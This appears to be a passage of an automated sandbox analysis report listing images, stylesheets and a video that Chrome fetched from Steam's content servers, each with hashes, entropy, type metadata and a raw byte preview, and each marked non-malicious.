        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................L.........................!1A..Qa."q.2..#B.....Rr...$3Cb..%4c..s..DEST..5..................................5......................!.1A.."Qa2q.....#B..R...Cb..3............?..._R.>pBh...R)1(,(...=.....S.....@..C@..OHc. ..J...J.*.(...QY..H.....d.H....(.:PX.@.....P.@....P.@.....h.BPPP.@....P.@....P.@....P.@....P.@....P.@....P.@....P.......1..4........z.@%4.L....(...=..h.Vlb....p)..Z.S...t5....@.`...K`M=..l....Y...6.......P4.....q.z.(......(......i..%...(......(......(......@..a@....P.@....P.@....t.A@...(.W...9....Vr.bq...(..(.P...h..@..(......(....k1....#c.j...T.L......T.)...9....+...v.X....vL..u....(L....m..".....rh.........7..".RM....T;...M..88=(.A....J.(.......(..SB. ...@.LP4%...(......(......(......(......(......(.......!B..b.....b.Z.=:.C-.EY.T...4.S.>.M<iq..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (19112), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):30770
        Entropy (8bit):5.9192193919145355
        Encrypted:false
        SSDEEP:768:kM/TQ4O/wWvLA6fLYj0M2dYEuoCHjvQeIn9/wWLq:k8s4O/wWvDfLYj0M2dYEuoCHrQe69/w5
        MD5:668D9B56F55F6D79DDD295267B68518A
        SHA1:AD521277E7BA515FEEE28E4FB3CD62AFDB6CA218
        SHA-256:DDC12EFF57A9E957968AF6B2B8619545DD26F3FEC3D85C4C607E5D0560FED7D5
        SHA-512:4B998E0CB01E3318F0F4D6709DAE9D18A18157328164EAF5B072454B2258712D0C9BD8DF9A3D4C721470F07B9C53D00B7DDA74159071A42448CF90E11967C83B
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/css/applications/store/9424.css?contenthash=65008c72e7e5586e0c2d
        Preview:............ZOBYq36SukEm_Fi_77g2q{position:relative;display:flex;flex-direction:column}.ZOBYq36SukEm_Fi_77g2q ._1Wl13domZv872ZcbC_PVbv{display:flex;flex-direction:row;flex:1;padding-top:10px}@media screen and (max-width: 700px){.ZOBYq36SukEm_Fi_77g2q ._1Wl13domZv872ZcbC_PVbv{flex-direction:column}}.ZOBYq36SukEm_Fi_77g2q .ERYporYCW1a-i4hFKkqM9{display:flex;flex-direction:row}.ZOBYq36SukEm_Fi_77g2q ._30Wg_JuATv6bZVQSiEOa3n{margin-top:5px}.ZOBYq36SukEm_Fi_77g2q ._1KeaVf4k5xaici5wKntAlv{flex:2}.ZOBYq36SukEm_Fi_77g2q ._1S9pkF1XVQsK6z-06HLup{display:flex;flex:2}.ZOBYq36SukEm_Fi_77g2q ._2ZDySoTopw8XofnCKLNxDL{flex:0;display:grid;gap:4px;margin-left:40px}@media screen and (max-width: 700px){.ZOBYq36SukEm_Fi_77g2q ._2ZDySoTopw8XofnCKLNxDL{display:flex;flex-direction:column;align-items:center;margin-left:0;margin-top:48px}}.ZOBYq36SukEm_Fi_77g2q ._2ZDySoTopw8XofnCKLNxDL ._3ph6wntM-n97-sHIlGQBnD{display:flex;flex-direction:column;align-items:flex-start;width:200px}.ZOBYq36SukEm_Fi_77g2q ._2ZDySoT
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):22286
        Entropy (8bit):7.962416922797294
        Encrypted:false
        SSDEEP:384:lMPlRerM5YogshssSm73ctW538T+UWRX+BoubEUhKcd2ZZ3Rq4ID5nah33I49S:l6ArM5fgyT73cE53RyoVUMcdYZ3Za2YD
        MD5:0AF0BF6E23A18F348EE97C8281B1DDC7
        SHA1:32AD2DC05BB0768D69DED417487B4A22D26CE59A
        SHA-256:A99A13AEADB9EDF8A34094F9EEA4A308EC9887C09A6DC56B394C62BF8D1C3ABD
        SHA-512:93115A104B217C9CF9BE09719FDED9FCE4D16AB4C183F2E7E156393B469534B945CA436C2A93049E00BD2964C4D7C1A2E4624CE8D54FAB843F1CFDF55028DBC0
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................$.............................................E..........................!.1.."AQ.a2q..#BR...3b..$r..Cc.&d.........................................>........................!1.A.Qa"q....2.....#3B...Rbr$..4cC..............?........w..S.*:7f..+..&....9<%...G.#.R ..?.`.Q!.L..Q.*.t.....P.X.H....9I.W..H....8...e..r.+..<(..ry).59Y,./..3.\.E.l.[.=..}0.M..r..S.'..>~...;.u..1....,.R.m....l..."L....:.2^Y[....d..O..@..I.y..qs....6......Tq..;.Y.....}...'.....1..P.t.7.Q.U.8.Q...G._.....3...AvKt.J$Z.!.7.A....!.....C.._*8h..2......\.4...X..!...0I}.^m...HN..RR.pp3..........yB.2.(<.7@..k.........2......PO.5XmjO.J......L%.5......tsM($cK.w,#.......Ur.F..J.>K...zz..\i8.....ds..D...'......&yd..@%..x.P....9..NE..L...e.-)..9.. ..8....)M.")....0o..}..H....YO...i.......O.O.&].o.S.....#.r......R2G..1...,.....=...H.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):94915
        Entropy (8bit):7.982055140976294
        Encrypted:false
        SSDEEP:1536:WJilyqpsnJNfP5JOxUtRCFz+Osly1feOTxlGk4I3dahZUWo5foeH1k+OvSIYaYIh:VyjN5JuMAgI1f1lGxadasv5fomk+OaaZ
        MD5:77C69F6163163A0C519BC5E023858131
        SHA1:B75285EDD065665E89CB0A0B32B861EDD6D4FE6B
        SHA-256:DAAD8D0B67353F3C6D94D2DE31B077A8FBB61E27F07B57E58194E6D203577106
        SHA-512:3C76D16B2BED54A946BF25F0629673935710AEDDC145D216EEBB66198636A62DC065F86A4A8BEC2D45DA354A340160DD0CAD45D440FAF3731A1C6A0D4627EC05
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1245620/ss_7bef8e5fb78ee8bd396c5ff17af10731edf52c5f.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................P.........................!.1..AQ"aq.2...#BR....3br..$4....5C....%EScs..&6DtT..................................=.......................!.1.AQ."aq..2......#B...R.3$4r..CSb.............?..a..5.../S[...3.#v#T-...#...k.MS@.f.-.....=P...b....$..C..Q...NvC....U...zVF.a5..9L.e..j.c........Z..sd.N...J^........Iijw...............[2>...5..n...K...G..Tw..P..R.$^F.. .,.B.r........;B.d..9.......ig...Oq.u..H.P.....N5..f.C......O.l.p.F.u`.w.N..9.T ...z.L.%.h...e:.ri..+....V&...2{..V...:J#..+.OO4.....U.......+w.7.Q........B#..E...y.......@.r......iMmPy...h*8.5Z{1.Gq/r_..#......."....J.4;..........a.&e..O..i'.....a.....~.....z1#.8:T..T.....iBe......':.h.n....].\.....|.S......lX....L\l..S.6.CSD....9..T..r.z..1..5....Xu.....1nG.q..,..$.\u.+..o.....5..F.~...a..F.g.l..ujr
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):3634
        Entropy (8bit):7.794028345481188
        Encrypted:false
        SSDEEP:96:xgefOw79InHborYQ7F81WnO4r6dj78VEc185Yv:owJGorv1WJ/2
        MD5:29733FC12120D092DE74B80D415327F0
        SHA1:EAFE269D3119E5E8A312459E67363A3FB7397663
        SHA-256:0A46FA735671FEB45F2E432D9DF993D44DB85BF701D0D8B8F2ECD67870F58797
        SHA-512:77DBECFEBD7926EAE62814F0C19FAA37C4966C5A1C7E8267543A16EB34018DFA76F1F944AB71C7752520E581B045BAAE0BC0B0CEFE299671918550138FD4A6BF
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................;...........................!1A.Qa.."q...2B..Rb...#3St.....................................0........................!1.A.Qaq..2.."R....C..............?...O.l....`...@.g$..$I..(.0..8.$A........u?X..I.`...OH..8... .....9.L... q..s........A.....|........E@...."..0...`.. .I......<s.:NL.*{..*.\@...y@.$.....{@........3....8.D s..d`..... .....`..H.V..g.~.R.Jy.....AF...#..iYw&.Za..u..!#....1..T'UOd~..Uz.n..p..3.[u02.3..~.....:.uL:...........+..O..#.S)...6......,y.F?...........Gk...<.t...b......S.}L?...d~....?u...;%1K.zRm....(q.~R#..r....r..21.b...b.\5.".^...rt....@....&I..f.d.s.....%<s.:H..}L.7....R@..s..............."..A..#..H.h......\......r|...L.......iI|...t..h..f.g.Ya.T....D.....x_....c....>]..O..g;?H..>...u..GJ..-.s.....O..z...2.k]4...y.).J.....9.NG..:..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.998293602042602
        Encrypted:true
        SSDEEP:24576:UopbEugUSm0xWydLSRJr+lH8YzBqsWCgDoza:vpbETUSdxWydeP+2YzBkn3
        MD5:2A50FC7ECA874EC65D2847A63600FDDA
        SHA1:37215FAB94FEF6B72DFED3EBA37E0CDF1F4D13A5
        SHA-256:93526C0281032E44C4ABAD10F61227C4F08DB270A3FB91CF7B158017D5C6EABB
        SHA-512:1DB216F0579FE993A389FA751396ECB5FE9BBAAF8B392C9F98AEE9DC85BC3966B55E55C43B6E0EC88AD9240B488068007AB3AD0D63A248B073D0554792BE4130
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie480_vp9.webm?t=1705420839:2f77e582f0cba3:6
        Preview:i....%....3H..^[!p.X........`.k...x,b.~..3,.^f.Z....#H..H...oD.]N1.........H..`-....0.K.....K..1.U..w.X.i..Y.L}..d,=...v.../.t.H..)..#....0...@..<.....3...py.N..g;.6...Oxzu....$..f8..G..b.m.g-V:.......>[H.cz......Z..N$..;I..8Sv.[..9O..Y.....7.......9.]....A...#u....NJ..T.q.J2..d.-:/e..R^..4...\..,.....XCMj.u.d?@S...!. .t.....Q...f4h...Rm$l..fP.K...;...@..!c...p.>..5_...........l.c....'".\ ....Q.......9d.4.s....Xq-$...M...u.7....B..p...u("..8...RzB..x..x..Ii|..cq..At}..%`I.e..r+X..a....?...).X...6I%.".;...<..4...../.F.H.<j=.U......g..q.D.#..T..hJ.s....y-.>..fW5.D.....L...H..c..........'...M.4...KO../y..=.B0d..U.q..7.a!........9j.v.@..4.n.)..d....~qLP.gH0j*..c.+...Gcw$........$..2.d..-.=.1.Pa@.......)a.d+.P.S...=gl.....kF..9..Q.x..(....N.0..l|.[.S.kep....Cb...20.m'..I;.v.9.q.-.pJ.L|..Hm.M(8.^.t.X........&=.jB....)........GvP.P1.....G..:.dL.7.Q.,.g...V...g.N.....o...f...eK.x.....z.N|h.3....RPJ.\R.Nb..~l`.y.OWQ.v..g..M..M..Z.7.yz..Z.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):8772
        Entropy (8bit):5.214652534628029
        Encrypted:false
        SSDEEP:192:Ft6jQtvRpP8WXzRqlVOAEOYhJyIP6XdWRmDLfqXoYlCb:FIjQtvrPTXzRqnOAEOSVAUmDTgBob
        MD5:B30CA6BC2C5BB707AEB6B5B927478A74
        SHA1:4894BC9813D53D76E2C0AC4E5CBBA21C81F0CC0D
        SHA-256:96A80FC8CA995D26A10FE33CC7577F9245AAB048E0BD92C11DC79BCB04AC9F21
        SHA-512:3EEE39FCC41306699AC88A3A2E89733C366815366A7C6EE782EDE7B35336A91B9ABBBEFA0DD607E37F6BB7D720225B6A4392E45675FCE1C598D8E16F2FD9B1F3
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/css/user_reviews.css?v=swymvCxbtweu&l=russian&_cdn=cloudflare
        Preview:../* report dialog */...user_review_report_dialog_explanation..{...width: 500px;...padding-bottom: 10px;...text-align: left;..}.....user_review_report_dialog_text_area..{...height: 100px;..}....select {...width: 100%;..}...bluefade {...background-image: url( 'https://store.cloudflare.steamstatic.com/public/shared/images//page_bg_blue.png');...margin-top: -21px;...padding-top: 20px;...background-position: 0px -1px;...background-repeat: no-repeat;..}....#rightContents {...width: 294px;...padding-top: 0px;...padding-right: 16px;..}...#rightContents .panel {....background: rgba(27,27,27,.36);....border-radius: 4px;....padding: 10px 10px 10px 11px;....margin: 0 0 10px 0;....border: 1px solid #1f1f20;....box-shadow: 1px 1px 0 0 #39393a;...}.....#rightContents .panel.owner {....border-color: #81a313;...}.....#rightContents .panel.admin {....border-color: #a55b13;...}.....#rightContents .panel.admin .title {....color: #a55b13;...}.....#rightContents .panel.admin .smallText {....font-size: 12px
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):239350
        Entropy (8bit):7.9885040463956525
        Encrypted:false
        SSDEEP:3072:1LdsEEZ+82mvrddDwHNXdfK63AMdCiSj10Mv23UX2zUmIyLR2CR+wUlfLdmhA:15G+9mvrDwnoMdJsjv23xvIyZhUlTAhA
        MD5:B37FECF336303A33CB36D7823701B127
        SHA1:D0B1061FE778AFA2680C0184177DE7DB22A153A2
        SHA-256:B13AD617EF14D927A168DC3F75CEF5B10D189601E74A5C12E64E216D6BE6D4A9
        SHA-512:DFA1B129BD7FB0960FA91C14E7B1961D66AB8AB91D24B4E49FFEB9A50E9BD8C8021D297CA56432ED1245109AA6ED48919CACCD68B7CDD693858728B4E4F204AB
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/wcc23c.png?t=1705420866
        Preview:.PNG........IHDR...X...........v....pHYs................KiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2023-02-20T14:18:57+02:00" xmp:ModifyDate="2023-02-20T14:18:57+02:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:e5b33602-a590-a34a-9014-611001da
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 616 x 353, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):318017
        Entropy (8bit):7.998180592739449
        Encrypted:true
        SSDEEP:6144:9H2k2Q7RkNSrgoh6HkM6cWU1/K4/BFIHiXi6+UYlXreQukI+J88AO/4AF04:FvPllrgg6HkM6D4/RoiwUYlXRX88//4A
        MD5:5CA954104D3C682BAD2E7F379F648493
        SHA1:80AF003E382C838E855BDE0CC63C84C82D925B2F
        SHA-256:B0F12FB11BC8F87B4DA0F3CC916D59F8350EDB5FB587F55AAC0608496D2A2F59
        SHA-512:865821D473757E34A2E03F910F4A5924C34F35B233246922CCF2C7BDAB502290429201638EAE016CD768C0365336D982069CF68F4BA62E198CA7D92173149176
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...h...a.....Kj.K....pHYs............... .IDATx.\.....#. .C.. ...C..+G.o.....G...._.9{U..@.-;.A..{.o.....,.o.....o..d.6./....cb1.i{...".s@.......[ ..6.+|..2..0A.2<......X...Zk.X.....r.C. .{!..</.Hx.K.......Pt...Da..hA...\<..sE....8bn..8.YpA."v.r=.$,....`.KR6...<+..e.........y=.x....<....p..azII<.%D.. .<DZ.._...w...->`..A..[...5..X.......#.9..$.5.&m.....]..Hx..!. i...Zx. i. ......sM..(...lP..]RK..).&..\[.......^...#K...0(.t,.f....h...")......$..i`H...[.{...1 ..6...5..I...g......}hz.L..,..{.,e.a......0.0........\.....I-.....$.4...seKhA..1`..x.....E.@.V"..5..8XY.B...M..."a.0._.......kP ....V.9..W.1.J......t..X.!....MH.....JU.-......S...y..H.._.Hbu`.^...y...L.4.<...!..C....8Z..b.+.yDbe.&2P......&w!Z.=.H/....M.Y.^.....$lu.4.|nr.Nf.......2(.w!..m....hz.r8.1,..]...8..s...I...x...... ..2. za..k......O?A.U.h.D,..|lRZ,..............H...04....1.6W&V;.......8..............\.....Z...|......I&..Y.K..%.k....8q.&. `..^.4...'.....]C4...]..`.qx.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (1819), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):87226
        Entropy (8bit):5.66553550858808
        Encrypted:false
        SSDEEP:1536:ONnreaPWZxrmucwoMf1abY1oB2n70HupuF8P+WaVgDYqiaiiP1rNUEs+k5T7EeEA:vtlDKpUnweoQk
        MD5:DA14CBD97F0DC1BA9704C2A3327A2DE0
        SHA1:4598D0ECCA474CA03DA7A96F2C7853EF6617C02E
        SHA-256:23D3FC45837792EA3C21C8C0F12FE7D86D062F363F9D988F6ED41AB35A85E87F
        SHA-512:D9130AE4D1E97F36CF180DBE0552C1DCC52F6A50AB30C8AC164915D78A02F3683CCB4543BED4A75B76F466E27C46568673ABD31D8C101294A26D94D4F733DEE1
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/css/shared_global.css?v=2hTL2X8NwbqX&l=english
        Preview::root {.../* System greys */...--gpSystemLightestGrey: #DCDEDF;...--gpSystemLighterGrey: #B8BCBF;...--gpSystemLightGrey: #8B929A;...--gpSystemGrey: #67707B;...--gpSystemDarkGrey: #3D4450;...--gpSystemDarkerGrey: #23262E;...--gpSystemDarkestGrey: #0E141B;...../* Store blue greys */...--gpStoreLightestGrey: #CCD8E3;...--gpStoreLighterGrey: #A7BACC;...--gpStoreLightGrey: #7C8EA3;...--gpStoreGrey: #4e697d;...--gpStoreDarkGrey: #2A475E;...--gpStoreDarkerGrey: #1B2838;...--gpStoreDarkestGrey: #000F18;...../* Gradients */...--gpGradient-StoreBackground: linear-gradient(180deg, var(--gpStoreDarkGrey) 0%, var(--gpStoreDarkerGrey) 80%);...--gpGradient-LibraryBackground: radial-gradient(farthest-corner at 40px 40px,#3D4450 0%, #23262E 80%);...../* Colours */...--gpColor-Blue: #1A9FFF;...--gpColor-BlueHi: #00BBFF;...--gpColor-Green: #5ba32b;...--gpColor-GreenHi: #59BF40;...--gpColor-Orange: #E35E1C;...--gpColor-Red: #D94126;...--gpColor-RedHi: #EE563B;...--gpColor-DustyBlue: #417a9b;...--gpColor-L
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 176 x 50, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):2584
        Entropy (8bit):7.591818812076699
        Encrypted:false
        SSDEEP:48:4wqQNn2xoJ35l3QWpQSufhbTCFV0Q0jkIPIH+UCKPnaqiLruSd+1w:oY2ml31ZCdqWQMkADnK41d+1w
        MD5:86A9CCC0B872F22006A48BC6C2500F4E
        SHA1:0EDCCF2CBC869816135C6FF4C3EEE0C49D0F41C1
        SHA-256:D8BBE461137D50211568449468A1981EF189248200EADD48C3141A9DF0B8F7FC
        SHA-512:43EBD681FE137718E45153B9CE062CE9426AC57D6CE907BD3B1C7709BF6F6D2AB4B49E22F2DC4F203DEDF860A895A4B58F4A01095E97722CE5F27935038F0B56
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.......2.......Q.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:595356BA543311EAAC5FF1C3D4DCAF18" xmpMM:DocumentID="xmp.did:595356BB543311EAAC5FF1C3D4DCAF18"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:595356B8543311EAAC5FF1C3D4DCAF18" stRef:documentID="xmp.did:595356B9543311EAAC5FF1C3D4DCAF18"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>tU......IDATx..][l.E.....Q(.....11.VTL."....cb.1../.`x.x...&..F}P.....$*........J..5^Z5..@Kc...3...?{f.....%_...f.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 240 x 233, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):77770
        Entropy (8bit):7.987500630243469
        Encrypted:false
        SSDEEP:1536:ky6xZ8lZlgr+mTNLj/73I6oKUgWhduOVe5AbERiQI4CEO:gxaiKmxK7g751R92EO
        MD5:84A5CC89B6688022F8DAD9DD0D65F931
        SHA1:82E387F5408C64B5C239EEBB62407E622C40A88D
        SHA-256:C05B15DC7EEEB78DD13A37F9CAD36F91D119622F7109EEA4CB40E80EB000DB51
        SHA-512:06C3099B4133FFA15C106E0C6EDAABBCD81BDC9124A260EB9EF8BC9581DD6E128C82A4EF62AC95164D43296BAD293C25149356A0B61CCE4ADCEBEAFC42ED1399
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............caNv...............<'A......IDATx..w.e.u....9.=....H..W....... ..f..Z...g4KZZ...Y..5.[..L....$E. @.(...|UVeV...7..3...""...jeE.{/nD.{.......#^{.....y....gfx.Z.s..p.V.~w.'..H..$...8..!D..... $.q..@ p.s8.!1..5.......?:......@H.B....w..BH...!..!....k..)|.."pNP*.I..8MPJ!.().|..).._J.@..#g..'.$R.......e.w[........H..........C.... ..@..U.r...y.5....;... ....3.2O.h.....0=9..j.,.82_'.2..\...,.........i..p..... Kz.6..u~.....G...m...u.:./..IY.<.)jQ...dz..A.....-b.S.$.p..'...R._...'...O...<..m.?.q.xd..Mn...O>Hc....?g...Y.K...d:#M5.X..X....8..A.{..k..2...9.u...B.C.......P. ...6..*d~o..7.......?.s.<?.z....../...|.'.....>=..S.;.D.%...a.p...*...\....~.TgH.@.X.7..G~K.G..}].k?../......~J.9.........q.\...c.9...k.....?...id.L.i..pB..gu.A.<.....I.....C....... ...+F'KP...U..X0....i......<...$Q....G.>.......}.Q.....b.....Y..Y...%..!0L.K.ju.'.B.Px2..!...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 1438x810, components 3
        Category:downloaded
        Size (bytes):31638
        Entropy (8bit):7.264346956363237
        Encrypted:false
        SSDEEP:384:6cqLF4ljYRJkqjOKHVGAw/y8ls0wpvv5XJ+aHjcsXch8a0djz1KtuUtcWjHeiyE:jqpUYkqSGVUyZb+aH3sOWHe+
        MD5:F286FFA4559E87B39F747032C70DBA79
        SHA1:502B3D0EDC60B0D528409C1C52C3EB178EB12D7C
        SHA-256:E2D02DA2C7CF431C33899F510D143EAB7FED32A357BDB0D7C2D8495B7069BD7A
        SHA-512:206AEC3EA0EA60A1F0F8C56AE52CB6968EA711A53EE7DD19A506F89AE0EAF508817545BE7D19757D66AD355F0D4B63909413F48F6414AD9DA5527CCFAB680694
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/page_bg_generated_v6b.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................*..........................................)......................!1AQaq........."R.................................................1!AaqQ............?..=.r.{..U.++...S.Q.R...%i.V{.........F.hJ.e..J...j*U.`....Yh.........`...O..m. .....7...........o....-.v...o..6.m.....'+..5.....v.`v.......... e.P@X..O....*.D.......$...5p....%......m.6...........U....UT.USo...@........h..E...S.......X......O.@.....=..O...P....._.........S................. ....@../..Pg.....*..4.......d..0D.QY.d@0...A(.......5...S..1(..(%...g.h..++.J.-.M.....#5ZE.V.....c5.*...Pe..V...Z.eg.A..C.B.D..".T.x...P...............E....4..`....,....._@..........*............j...%....&..S.....PEU....By..?....g.....(*..A....`*.............~...~...@...|.(.............S..TED..P@OB...E@K.A0.TA=...A..*5.....h..*,dQ.. ...F..dE....5...@.J3H".P@...`..Q...%Q.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):2962
        Entropy (8bit):7.8107680482794315
        Encrypted:false
        SSDEEP:48:vllW/ynxidcUQWJW5HmwbBbDedFksoxUIAA17tm82IeiX39kDAjx9+2qYvC:vTW60dlNW5HpD6H/A6IldkDwJrC
        MD5:77F7A41B5E97E609775CEBA470A131FA
        SHA1:AD124121B7AC5A855FBC6F00D0C06126B65A8D73
        SHA-256:C08D51CEEEB0FCD12881CE819C6F940CE4910AC56C347E9482EE1DBDF28C3E54
        SHA-512:F421AC3EDD403EC6B08C37F1DCA06B57F7A2C0BD4BF99F74331D27848AA650B258508AF849E98699775D50BB861183E64925BCADDFEF2BC416C8D32A798A9FF1
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................?.........................!..1A"2Q..aq.3B.....45R..#Dr.bst..................................&.....................!1.A.Q"a.2.qB..............?..SQ<R.c.l.........6.v...$.qC.q..+....iY6}.%WI.67.N....0BWH'.........R..k.........u.WC+Y.U.f`..,h..N.hP..w.cD"..P......%..WK...T.Z.Xb.SWI.5..&.3........qT#......h.Fkt...z.f.....8..+D.8dW....4.xc.i.v..b...........[.....$U....o....UIfclCC..M..1.@....{.-...Z....f@-...1:x..8....y6.^.v...9..k3X*i'.[.b6v]..o~......).DFU...cD..[QH!.....b.D"....(..1h..P.A"..;a....._.....M .j.P.m:....&j9.x.4.Z.r..ElIx....Z.......p...^S....7.:.Q..SJ..f.......t.N..dT..o.r...h.l.SQ.V!x..h..J...2.A....z..G.....8..&....6X..5.....:A....Uu.RZ..V5...._....i-2.7*...;......r(.c.....!...,.E.*.}?en.t:...l\.....(......hYK.\/.........k.uq...x[.5?.QH..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (1819), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):86933
        Entropy (8bit):5.664768291484957
        Encrypted:false
        SSDEEP:1536:OeCOT9idwAQDrZjVXKIrKl6/SNQ2zYFS/S/MxDPE52DjLLjLSUWEFh5KD8ASvxrc:cIkfD3UnweoQt
        MD5:A941B951BE6BAEAD890CD2CC184A3AD0
        SHA1:DCF301217F3C96A2D7B29F7D99EE06935A200CEA
        SHA-256:BF23CC242135C8C7463FAB041335272BA5327D1236553D16E56D5FAD5915A575
        SHA-512:AD01A11BACC8C08056A7DE070439E0244D0F4230045102CDDED6F7FCBE568785DB7D08A9CAF54EE291F2B29A4B99B19F2829A0DE01D738D5101EA74694B69307
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=qUG5Ub5rrq2J&l=russian&_cdn=cloudflare
        Preview::root {.../* System greys */...--gpSystemLightestGrey: #DCDEDF;...--gpSystemLighterGrey: #B8BCBF;...--gpSystemLightGrey: #8B929A;...--gpSystemGrey: #67707B;...--gpSystemDarkGrey: #3D4450;...--gpSystemDarkerGrey: #23262E;...--gpSystemDarkestGrey: #0E141B;...../* Store blue greys */...--gpStoreLightestGrey: #CCD8E3;...--gpStoreLighterGrey: #A7BACC;...--gpStoreLightGrey: #7C8EA3;...--gpStoreGrey: #4e697d;...--gpStoreDarkGrey: #2A475E;...--gpStoreDarkerGrey: #1B2838;...--gpStoreDarkestGrey: #000F18;...../* Gradients */...--gpGradient-StoreBackground: linear-gradient(180deg, var(--gpStoreDarkGrey) 0%, var(--gpStoreDarkerGrey) 80%);...--gpGradient-LibraryBackground: radial-gradient(farthest-corner at 40px 40px,#3D4450 0%, #23262E 80%);...../* Colours */...--gpColor-Blue: #1A9FFF;...--gpColor-BlueHi: #00BBFF;...--gpColor-Green: #5ba32b;...--gpColor-GreenHi: #59BF40;...--gpColor-Orange: #E35E1C;...--gpColor-Red: #D94126;...--gpColor-RedHi: #EE563B;...--gpColor-DustyBlue: #417a9b;...--gpColor-L
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, progressive, precision 8, 500x250, components 3
        Category:dropped
        Size (bytes):55032
        Entropy (8bit):7.967319755260824
        Encrypted:false
        SSDEEP:768:4Yyn4NpPmLHzCY9mTYfMzFKUCgegecg/0Iro8tuTwpvUBhCYPLp0Agn5VbeSmK4c:4ErmDhfUQDBtEmqXFE5VbedA
        MD5:355368C09AE89434B648D473EC54F5F4
